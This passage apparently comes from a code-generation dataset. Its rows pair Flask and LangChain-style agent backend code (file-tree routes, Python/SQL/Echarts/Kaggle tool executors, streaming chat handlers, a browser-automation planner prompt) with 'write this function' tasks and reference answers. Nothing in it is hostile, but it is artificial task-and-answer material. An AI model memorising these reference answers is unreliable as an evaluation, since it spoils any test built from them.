if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0,
highlighted_files=highlighted_files)
return jsonify(current_path_tree_list)
else:
return Response(response=None, status=f"{UNFOUND} Directory not found")
except Exception as e:
return Response(response=None, status=f"{INTERNAL} Directory not found") | Gets a file path tree of one file. |
188,442 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
app = Flask(__name__)
app.config["UPLOAD_FOLDER"] = os.path.dirname(current_path) + "/data"
app.config["CODE_EXECUTION_MODE"] = os.getenv("CODE_EXECUTION_MODE", "local")
UNFOUND = 404
INTERNAL = 500
DEFAULT_USER_ID = "DefaultUser"
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
The provided code snippet includes necessary dependencies for implementing the `set_default_examples` function. Write a Python function `def set_default_examples() -> Response` to solve the following problem:
Sets default files for each user.
Here is the function:
def set_default_examples() -> Response:
"""Sets default files for each user."""
try:
# Should be called after auth is verified
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
root_path = create_personal_folder(user_id)
example_dir = os.path.dirname(os.path.dirname(app.config["UPLOAD_FOLDER"]))
example_path = os.path.join(example_dir, "data/examples/")
if os.path.exists(example_path):
shutil.copytree(example_path, root_path, dirs_exist_ok=True)
return jsonify(
{"success": True, "message": "Default examples are set successfully"})
else:
return Response(response=None,
status=f"{UNFOUND} Directory not found at {example_dir}")
except Exception as e:
return Response(response=None,
status=f"{INTERNAL} Fail to Set Default Examples") | Sets default files for each user. |
188,443 | import traceback
from typing import Dict, List, Union
from flask import Response, request, stream_with_context, Response
from backend.api.file import _get_file_path_from_node
from backend.api.language_model import get_llm
from backend.app import app
from backend.main import (
grounding_source_pool,
jupyter_kernel_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.charts import polish_echarts
from backend.utils.streaming import (
single_round_chat_with_executor,
single_round_chat_with_agent_streaming,
)
from backend.utils.utils import get_data_summary_cls
from backend.schemas import OVERLOAD, UNAUTH, NEED_CONTINUE_MODEL
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks import AgentStreamingStdOutCallbackHandler
from real_agents.adapters.data_model import DatabaseDataModel, DataModel, JsonDataModel, \
TableDataModel
from real_agents.adapters.executors import ChatExecutor
from real_agents.adapters.interactive_executor import initialize_agent
from real_agents.data_agent import CodeGenerationExecutor, KaggleDataLoadingExecutor
from real_agents.adapters.memory import ConversationReActBufferMemory, \
ReadOnlySharedStringMemory
def create_interaction_executor(
grounding_source_dict: Dict[str, DataModel],
code_interpreter_languages: List[str],
code_interpreter_tools: List[str],
llm: BaseLanguageModel,
llm_name: str,
user_id: str = None,
chat_id: str = None,
code_execution_mode: str = "local",
) -> AgentExecutor:
"""Creates an agent executor for interaction.
Args:
grounding_source_dict: A dict of grounding source filepath and data.
code_interpreter_languages: A string to indicate the programming language to use.
code_interpreter_tools: A list of augmented data tools.
llm: A llm model.
llm_name: A string llm name.
user_id: A string of user id.
chat_id: A string chat id.
code_execution_mode: A string indicating where code is executed.
Returns:
An agent executor.
"""
# Initialize Memory
memory = ConversationReActBufferMemory(
memory_key="chat_history", return_messages=True, llm=llm, max_token_limit=3500
)
read_only_memory = ReadOnlySharedStringMemory(memory=memory)
# Initialize tools(executors)
basic_chat_executor = ChatExecutor()
python_code_generation_executor = CodeGenerationExecutor(
programming_language="python", memory=read_only_memory)
sql_code_generation_executor = CodeGenerationExecutor(programming_language="sql",
memory=read_only_memory)
echart_code_generation_executor = CodeGenerationExecutor(
programming_language="python", memory=read_only_memory, usage="echarts"
)
kaggle_data_loading_executor = KaggleDataLoadingExecutor()
def run_python_code_builder(term: str) -> Union[Dict, DataModel]:
try:
# Only TableDataModel are allowed as input to python
# input_grounding_source = [gs for _, gs in grounding_source_dict.items()
# if isinstance(gs, TableDataModel)]
input_grounding_source = [gs for gs in grounding_source_dict.values()]
# Get the result
results = python_code_generation_executor.run(
user_intent=term,
llm=llm,
grounding_source=input_grounding_source,
user_id=user_id,
chat_id=chat_id,
code_execution_mode=code_execution_mode,
jupyter_kernel_pool=jupyter_kernel_pool,
)
logger.bind(msg_head=f"PythonCodeBuilder results({llm})").debug(results)
if results["result"]["success"]:
if results["result"]["result"] is not None:
raw_output = results["result"]["result"]
elif results["result"]["stdout"] != "":
raw_output = results["result"]["stdout"]
else:
raw_output = ""
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": raw_output,
"images": results["result"]["outputs"] if ".show()" in results[
"intermediate_steps"] else [],
"intermediate_steps": results["intermediate_steps"],
},
filter_keys=["images"],
)
else:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": results["result"]["error_message"],
"intermediate_steps": results["intermediate_steps"],
}
)
return observation
except Exception as e:
logger.bind(msg_head=f"PythonCodeBuilder error({llm})").error(str(e))
traceback.print_exc()
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
def run_sql_code_builder(term: str) -> Union[Dict, DataModel]:
try:
def convert_grounding_source_as_db(
grounding_source_dict: Dict[str, DataModel]
) -> Union[List[TableDataModel], DatabaseDataModel]:
db_grounding_source = [
gs for _, gs in grounding_source_dict.items() if
isinstance(gs, DatabaseDataModel)
]
table_grounding_source = [
gs for _, gs in grounding_source_dict.items() if
isinstance(gs, TableDataModel)
]
assert len(db_grounding_source) <= 1
if len(table_grounding_source) == 0:
# Only DatabaseDataModel. Assume there is at least one grounding
# source
return db_grounding_source[0]
else:
for t_gs in table_grounding_source:
if len(db_grounding_source) == 0:
# No DatabaseDataModel, then convert the first TableModel
# into DatabaseDataModel.
if t_gs.db_view is None:
t_gs.set_db_view(
DatabaseDataModel.from_table_data_model(t_gs))
db_gs = t_gs.db_view
db_grounding_source.append(db_gs)
else:
# Insert TableDataModel into the existing DatabaseDataModel
db_gs = db_grounding_source[0]
db_gs.insert_table_data_model(t_gs)
return db_gs
input_grounding_source = convert_grounding_source_as_db(
grounding_source_dict)
results = sql_code_generation_executor.run(
user_intent=term,
grounding_source=input_grounding_source,
llm=llm,
)
logger.bind(msg_head=f"SQLQueryBuilder results({llm})").debug(results)
if results["result"]["success"]:
observation = JsonDataModel.from_raw_data({
"success": True,
"result": results["result"]["result"],
"intermediate_steps": results["intermediate_steps"],
})
else:
observation = JsonDataModel.from_raw_data({
"success": False,
"result": results["result"]["error_message"],
"intermediate_steps": results["intermediate_steps"],
})
return observation
except Exception as e:
logger.bind(msg_head=f"SQLQueryBuilder results({llm})").error(str(e))
traceback.print_exc()
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
def run_echarts_interactive_plotter(term: str) -> Union[Dict, DataModel]:
try:
input_grounding_source = [gs for _, gs in grounding_source_dict.items() if
isinstance(gs, TableDataModel)]
results = echart_code_generation_executor.run(
user_intent=term,
llm=llm,
grounding_source=input_grounding_source,
user_id=user_id,
chat_id=chat_id,
code_execution_mode=code_execution_mode,
jupyter_kernel_pool=jupyter_kernel_pool,
)
logger.bind(msg_head=f"PlotInteractivePlotter results({llm})").debug(
results)
if results["result"]["success"]:
results = JsonDataModel.from_raw_data(
{
"success": True,
"result": "",
"echarts": polish_echarts(results["result"]["stdout"]),
"intermediate_steps": results["intermediate_steps"],
},
filter_keys=["result", "echarts"],
)
else:
results = JsonDataModel.from_raw_data(
{
"success": False,
"result": results["result"]["error_message"],
"intermediate_steps": results["intermediate_steps"],
}
)
return results
except Exception as e:
logger.bind(msg_head=f"PlotInteractivePlotter error({llm})").error(str(e))
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
def run_kaggle_data_loader(term: str) -> Union[Dict, DataModel]:
try:
results = kaggle_data_loading_executor.run(
user_intent=term,
llm=llm,
)
logger.bind(msg_head=f"KaggleDataLoader results({llm})").debug(results)
results = JsonDataModel.from_raw_data(
{
"success": True,
"kaggle_action": results["kaggle_action"],
"kaggle_output_info": results["kaggle_output_info"],
},
)
return results
except Exception as e:
logger.bind(msg_head=f"KaggleDataLoader results({llm})").error(str(e))
traceback.print_exc()
results = basic_chat_executor.run(user_intent=term, llm=llm)
return results["result"]
tool_dict = {
"PythonCodeBuilder": Tool(
name="PythonCodeBuilder",
func=run_python_code_builder,
description="""
Description: This tool adeptly turns your textual problem or query into Python code & execute it to get results. It shines when dealing with mathematics, data manipulation tasks, general computational problems and basic visualization like matplotlib. Please note it does not generate database queries.
Input: A natural language problem or question.
Output: A Python program + its execution result to solve the presented problem or answer the question.
Note: The tool MUST be used whenever you want to generate & execute Python code.
""",
),
"SQLQueryBuilder": Tool(
name="SQLQueryBuilder",
func=run_sql_code_builder,
description="""
Description: Specialized for database tasks, this tool converts your natural language query into SQL code & execute it to get results. It's particularly suited for creating database queries, but it doesn't solve mathematical problems or perform data manipulations outside the SQL context. Be sure to specify the table name for successful operation.
Input: A natural language query related to database operations, along with the name of the table on which the query will operate.
Output: A SQL program, ready to execute on the specified database table, and its execution result.
Note: It is ALWAYS preferable to use the tool whenever you want to generate SQL query & execute the SQL query.
""",
),
"Echarts": Tool(
name="Echarts",
func=run_echarts_interactive_plotter,
description="""
Description: Dive into the world of data visualization with this specialized Echarts tool. It takes your data table and creates Echarts code & show Echarts for four distinct chart types: scatter, bar, line, and pie, selecting the most appropriate labels and titles.
Input: A natural language query detailing your desired visualization, no other words.
Output: An Echarts script, specifically tailored for your data, that generates an interactive chart upon execution.
Note: Currently, this tool supports only the listed chart types. Please ensure your desired visualization aligns with these options to experience the full capabilities of this dynamic Echarts tool.""",
),
"KaggleDataLoader": Tool(
name="KaggleDataLoader",
func=run_kaggle_data_loader,
description="""
Description: The KaggleDataLoader tool allows you to seamlessly connect to Kaggle datasets. It allows you to load specific datasets by providing the exact dataset path, or it can aid in the search and retrieval of datasets based on the information given in your user input, providing you with a vast array of data sources for your projects.
Input: A natural language intent that may mention path of the Kaggle dataset, or some keyword or other relevant information about the dataset you are interested in.
Output: The action you want to perform, and the extracted path or searched relevant datasets depending on your input.
""",
),
}
# Data profiling is not activated in agent
IGNORE_TOOLS = ["DataProfiling"]
# Activate tools according to the user selection
tools = [tool_dict[lang["name"]] for lang in code_interpreter_languages]
for tool in code_interpreter_tools:
if tool["name"] not in IGNORE_TOOLS:
tools.append(tool_dict[tool["name"]])
# Build the chat agent with LLM and tools
continue_model = llm_name if llm_name in NEED_CONTINUE_MODEL else None
interaction_executor = initialize_agent(tools, llm, continue_model, memory=memory,
verbose=True)
return interaction_executor
def _get_file_path_from_node(folder: str, file_node: dict) -> Any:
path_tree_list: list = []
id_to_path_dict = {0: folder}
_path_tree_for_react_dnd_treeview(path_tree_list, id_to_path_dict, folder, 0)
path = id_to_path_dict[file_node["id"]]
return path
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
app = Flask(__name__)
app.config["UPLOAD_FOLDER"] = os.path.dirname(current_path) + "/data"
app.config["CODE_EXECUTION_MODE"] = os.getenv("CODE_EXECUTION_MODE", "local")
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
grounding_source_pool: ChatMemoryManager = ChatMemoryManager()
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
UNAUTH = 401
OVERLOAD = 503
DEFAULT_USER_ID = "DefaultUser"
def get_data_summary_cls(file_path: str) -> DataSummaryExecutor:
suffix = Path(file_path).suffix
if suffix == ".csv":
data_summary_cls = TableSummaryExecutor
elif suffix == ".tsv" or suffix == ".txt":
raise NotImplementedError("Not implemented yet")
elif suffix == ".xlsx" or suffix == ".xls":
data_summary_cls = TableSummaryExecutor
elif suffix == ".sqlite" or suffix == ".db":
data_summary_cls = TableSummaryExecutor
elif suffix == ".jpeg" or suffix == ".png" or suffix == ".jpg":
data_summary_cls = ImageSummaryExecutor
else:
raise ValueError("File type not allowed to be set as grounding source")
return data_summary_cls
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
def single_round_chat_with_agent_streaming(
stream_handler: AgentStreamingStdOutCallbackHandler,
interaction_executor: AgentExecutor,
user_intent: str,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm_name: str,
app_type: str = "plugins",
) -> Any:
"""Streams the response of the agent to the frontend."""
assert app_type in APP_TYPES, f"app_type should be one of {APP_TYPES}"
with multiprocess.Manager() as share_manager:
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
memory_pool[chat_id] = []
stream_handler.for_display = share_list
chat_thread = multiprocess.Process(
target=_wrap_agent_caller,
args=(
interaction_executor,
{
"input": user_intent,
},
chat_id,
err_pool,
memory_pool,
[stream_handler],
),
)
threading_pool.register_thread(chat_id, chat_thread)
chat_thread.start()
empty_s_time: float = -1
last_heartbeat_time: float = -1
timeout = TIME_OUT_MAP[app_type]
LEFT_SIGN = "("
RIGHT_SIGN = ")"
start_buffer = False
streamed_transition_text_buffer = ""
streamed_links = []
converted_card_info_list = []
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# Display streaming to frontend
display_stream = DisplayStream(execution_result_max_tokens=EXECUTION_RESULT_MAX_TOKENS_MAP[app_type])
is_block_first, current_block_type = False, None
intermediate_list, final_list = [], [] # Only for database storage
try:
while chat_thread.is_alive() or len(stream_handler.for_display) > 0:
# print(memory_pool, err_pool, "out")
if stream_handler.is_end:
# The ending of the streaming is marked by the is_end variable from AgentStreamingStdOutCallbackHandler in agent_streaming.py
break
if len(stream_handler.for_display) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
if last_heartbeat_time == -1:
last_heartbeat_time = time.time()
else:
if time.time() - last_heartbeat_time > HEARTBEAT_INTERVAL and chat_thread.is_alive():
last_heartbeat_time = -1
yield _streaming_token(
{"text": "🫀", "type": "heartbeat", "final": False}, False, user_id, chat_id, False
)
else:
empty_s_time = -1
last_heartbeat_time = -1
while len(stream_handler.for_display) > 0:
token = stream_handler.for_display.pop(0)
items_to_display = display_stream.display(token)
# Skip the "identifier" and "key" token
if items_to_display is None:
continue
for item in items_to_display:
# Check if the block type is changed
if item["type"] != current_block_type:
current_block_type = item["type"]
is_block_first = True
else:
is_block_first = False
is_final = item.get("final", False)
# Render the item(s)
if item["type"] in STREAM_BLOCK_TYPES:
# Render image and echarts as block
yield _streaming_block(item, is_final, user_id, chat_id)
elif item["type"] in STREAM_TOKEN_TYPES:
# Render the rest as plain text
item["text"] = _render_preprocess(item["text"])
yield _streaming_token(item, is_final, user_id, chat_id, is_block_first)
# Save the intermediate steps and final answer
if is_final:
final_list.append(item)
else:
intermediate_list.append(item)
if item["type"] == "transition" and item["text"] == RIGHT_SIGN:
start_buffer = False
link = streamed_transition_text_buffer
streamed_transition_text_buffer = ""
card_info_list = extract_card_info_from_text(link)
# empty the buffer after extracting card info
streamed_transition_text_buffer = ""
if len(card_info_list) > 0:
streaming_card_info_list: list[dict[str, Any]] = [
{
"final_answer": {
"text": json.dumps(card_info),
"type": "card_info",
},
"is_block_first": False,
"streaming_method": "card_info",
"user_id": user_id,
"chat_id": chat_id,
}
for card_info in card_info_list
]
streamed_links.extend([card_info["web_link"] for card_info in card_info_list])
converted_card_info_list.extend(
[
{
"text": stream_card_info["final_answer"]["text"],
"type": stream_card_info["final_answer"]["type"],
}
for stream_card_info in streaming_card_info_list
]
)
for streaming_card_info in streaming_card_info_list:
yield pack_json(streaming_card_info)
if start_buffer == True:
streamed_transition_text_buffer += item["text"]
if item["type"] == "transition" and item["text"] == LEFT_SIGN:
start_buffer = True
except Exception as e:
import traceback
traceback.print_exc()
# Wait for the chat thread to finish
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
# Response Error!!
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
message_list_from_memory = memory_pool[chat_id]
del stream_handler
# share_manager.shutdown()
del memory_pool, err_pool, share_list, share_manager, interaction_executor
# Save conversation to memory
new_human_message = message_list_from_memory[-2]
new_ai_message = message_list_from_memory[-1]
new_human_message.update({"message_id": human_message_id, "parent_message_id": parent_message_id})
new_ai_message.update({"message_id": ai_message_id, "parent_message_id": human_message_id})
message_list.extend([new_human_message, new_ai_message])
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New human message").debug(new_human_message)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New ai message").debug(new_ai_message)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Save conversation to database
db = get_user_conversation_storage()
# Combine the streaming tokens/blocks
intermediate_list_combined = _combine_streaming(intermediate_list)
final_list_combined = _combine_streaming(final_list)
if len(converted_card_info_list) > 0:
final_list_combined.extend(converted_card_info_list)
# Insert User Message, if regenerate there is no need to insert again
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": user_intent,
"data_for_llm": message_list[-2]["message_content"],
"raw_data": None,
}
)
# Insert AI Message
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": human_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": intermediate_list_combined,
"final_answer": final_list_combined,
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
def single_round_chat_with_executor(
executor: Any,
user_intent: Any,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm: BaseLanguageModel,
app_type: str = "copilot",
) -> Any:
"""Streams the response of the executor to the frontend."""
stream_handler = executor.stream_handler
share_manager = multiprocess.Manager()
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
stream_handler._all = share_list
memory_pool[chat_id] = []
chat_thread = multiprocess.Process(
target=_wrap_executor_caller,
args=(
executor,
user_intent,
llm,
chat_id,
err_pool,
memory_pool,
),
)
threading_pool.register_thread(chat_id, chat_thread)
empty_s_time: float = -1
timeout = TIME_OUT_MAP[app_type]
chat_thread.start()
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# FIXME: treat data summary as a special tool
STREAM_TOOL_TYPE = "tool"
data_summary_tool_item = {
"text": executor.tool_name,
"type": STREAM_TOOL_TYPE,
}
yield _streaming_block(data_summary_tool_item, is_final=False, user_id=user_id, chat_id=chat_id)
is_block_first = True
final_answer = []
while chat_thread.is_alive() or len(stream_handler._all) > 0:
if stream_handler.is_end:
break
if len(stream_handler._all) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
else:
empty_s_time = -1
while len(stream_handler._all) > 0:
text = stream_handler._all.pop(0)
final_answer.append(text)
if is_block_first:
is_block_first_ = True
is_block_first = False
else:
is_block_first_ = False
yield pack_json(
{
"final_answer": {
"type": "text",
"text": text + " ",
},
"is_block_first": is_block_first_,
"streaming_method": "char",
"user_id": user_id,
"chat_id": chat_id,
}
)
time.sleep(0.035)
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0 or len(final_answer) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
del share_list, stream_handler
del memory_pool, err_pool, share_manager, executor
# Save conversation to memory
final_answer_str = " ".join(final_answer)
message_list.append(
{
"message_id": ai_message_id,
"parent_message_id": parent_message_id,
"message_type": "ai_message",
"message_content": final_answer_str,
}
)
logger.bind(user_id=user_id, chat_id=chat_id, api="chat/", msg_head="New data summary message").debug(
message_list[-1]
)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Database Operations
db = get_user_conversation_storage()
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": [
data_summary_tool_item,
],
"final_answer": [
{
"text": final_answer,
"type": "plain",
}
],
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
The provided code snippet includes necessary dependencies for implementing the `chat` function. Write a Python function `def chat() -> Response | Dict` to solve the following problem:
Returns the chat response of data agent.
Here is the function:
def chat() -> Response | Dict:
"""Returns the chat response of data agent."""
try:
# Get request parameters
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
user_intent = request_json["user_intent"]
parent_message_id = int(request_json["parent_message_id"])
code_interpreter_languages = request_json.get("code_interpreter_languages", [])
code_interpreter_tools = request_json.get("code_interpreter_tools", [])
api_call = request_json.get("api_call", None)
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.7)
stop_words = ["[RESPONSE_BEGIN]", "TOOL RESPONSE"]
kwargs = {
"temperature": temperature,
"stop": stop_words,
}
# Get language model
stream_handler = AgentStreamingStdOutCallbackHandler()
llm = get_llm(llm_name, **kwargs)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Request json").debug(request_json)
if api_call:
# Load/init grounding source
grounding_source_dict = grounding_source_pool.get_pool_info_with_id(user_id,
chat_id,
default_value={})
# Find the mainstay message list from leaf to root
activated_message_list = message_pool.get_activated_message_list(
user_id, chat_id, default_value=list(),
parent_message_id=parent_message_id
)
assert api_call["api_name"] == "DataProfiling"
ai_message_id = message_id_register.add_variable("")
file_node = api_call["args"]["activated_file"]
folder = create_personal_folder(user_id)
file_path = _get_file_path_from_node(folder, file_node)
executor = get_data_summary_cls(file_path)()
gs = grounding_source_dict[file_path]
return stream_with_context(
Response(
single_round_chat_with_executor(
executor,
user_intent=gs,
human_message_id=None,
ai_message_id=ai_message_id,
user_id=DEFAULT_USER_ID,
chat_id=api_call["args"]["chat_id"],
message_list=activated_message_list,
parent_message_id=api_call["args"]["parent_message_id"],
llm=llm,
app_type="copilot",
),
content_type="application/json",
)
)
else:
# Load/init grounding source
grounding_source_dict = grounding_source_pool.get_pool_info_with_id(user_id,
chat_id,
default_value={})
# Build executor and run chat
interaction_executor = create_interaction_executor(
grounding_source_dict=grounding_source_dict,
code_interpreter_languages=code_interpreter_languages,
code_interpreter_tools=code_interpreter_tools,
llm=llm,
llm_name=llm_name,
user_id=user_id,
chat_id=chat_id,
code_execution_mode=app.config["CODE_EXECUTION_MODE"],
)
# Find the mainstay message list from leaf to root
activated_message_list = message_pool.get_activated_message_list(
user_id, chat_id, default_value=list(),
parent_message_id=parent_message_id
)
message_pool.load_agent_memory_from_list(interaction_executor.memory,
activated_message_list)
human_message_id = message_id_register.add_variable(user_intent)
ai_message_id = message_id_register.add_variable("")
return stream_with_context(
Response(
single_round_chat_with_agent_streaming(
interaction_executor=interaction_executor,
user_intent=user_intent,
human_message_id=human_message_id,
ai_message_id=ai_message_id,
user_id=user_id,
chat_id=chat_id,
message_list=activated_message_list,
parent_message_id=parent_message_id,
llm_name=llm_name,
stream_handler=stream_handler,
app_type="copilot"
),
content_type="application/json",
)
)
except Exception as e:
try:
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Chat error").error(str(e))
import traceback
traceback.print_exc()
except:
# if user_id & chat_id not found, unauth err
return Response(response=None, status=f"{UNAUTH} Invalid Authentication")
return Response(response=None,
status=f"{OVERLOAD} Server is currently overloaded") | Returns the chat response of data agent. |
188,444 | from time import sleep
import copy
import redis
import json
import pickle
import traceback
from flask import Response, request, stream_with_context
from typing import Dict, Union
import os
from langchain.schema import HumanMessage, SystemMessage
from backend.api.language_model import get_llm
from backend.main import app, message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL
from backend.schemas import DEFAULT_USER_ID
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.models import ChatOpenAI
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_webot_agent
from real_agents.web_agent import WebBrowsingExecutor, WebotExecutor
def get_plan(instruction: str, start_url: str, chat_llm: ChatOpenAI):
# fixme: Move this into a separate chain or executors to decompose the LLMs
system_message = f"""
You are a planner to assist another browser automation assistant.
Here is the instruction for the other assistant:
```
You MUST take one of the following actions. NEVER EVER EVER make up actions that do not exist:
1. click(element): Clicks on an element
2. setValue(element, value: string): Focuses on and sets the value of an input element
3. finish(): Indicates the task is finished
4. fail(): Indicates that you are unable to complete the task
You will be be given a task to perform and the current state of the DOM. You will also be given previous actions that you have taken. You may retry a failed action up to one time.
This is an example of an action:
<Thought>I should click the add to cart button</Thought>
<Action>click(223)</Action>
You MUST always include the <Thought> and <Action> open/close tags or else your response will be marked as invalid.
Rules you MUST follow:
1. You must only take one step at a time. You cannot take multiple actions in a single response.
2. You should not consider the action to present the result to the user. You only need to do available actions. If info in current page is enough for the user to solve the problem, you should finish.
```
Now your responsibility is to give a step-by-step plan according to user's instruction. This plan will be given to the assistant as a reference when it is performing tasks.
""".strip()
human_message = f"""
The user requests the following task:
{instruction}
Now you are at {start_url}
Provide a plan to do this (you can use pseudo description as below to describe the item).
Here is an example case:
request: Go to google calendar to schedule a meeting
current url: "https://google.com"
example plan:
1. setValue(searchBar, "google calendar")
2. click(search)
3. click(the item with title of google calendar)
4.1 if user has loginned
do nothing
4.2 if user hasn't loginned
do login
5. click(create event button)
6. setValue(event title input bar, "meeting")
7. click(save event button)
8. finish()
""".strip()
messages = [SystemMessage(content=system_message),
HumanMessage(content=human_message)]
response = chat_llm(messages).content
return response | null |
188,445 | from time import sleep
import copy
import redis
import json
import pickle
import traceback
from flask import Response, request, stream_with_context
from typing import Dict, Union
import os
from langchain.schema import HumanMessage, SystemMessage
from backend.api.language_model import get_llm
from backend.main import app, message_id_register, message_pool, logger
from backend.utils.streaming import single_round_chat_with_agent_streaming
from backend.schemas import OVERLOAD, NEED_CONTINUE_MODEL
from backend.schemas import DEFAULT_USER_ID
from real_agents.adapters.llm import BaseLanguageModel
from real_agents.adapters.agent_helpers import AgentExecutor, Tool
from real_agents.adapters.callbacks.agent_streaming import \
AgentStreamingStdOutCallbackHandler
from real_agents.adapters.models import ChatOpenAI
from real_agents.adapters.memory import ConversationReActBufferMemory
from real_agents.adapters.data_model import DataModel, JsonDataModel
from real_agents.adapters.interactive_executor import initialize_webot_agent
from real_agents.web_agent import WebBrowsingExecutor, WebotExecutor
def reset_webot(user_id: str, chat_id: str):
webot = WebBrowsingExecutor(None)
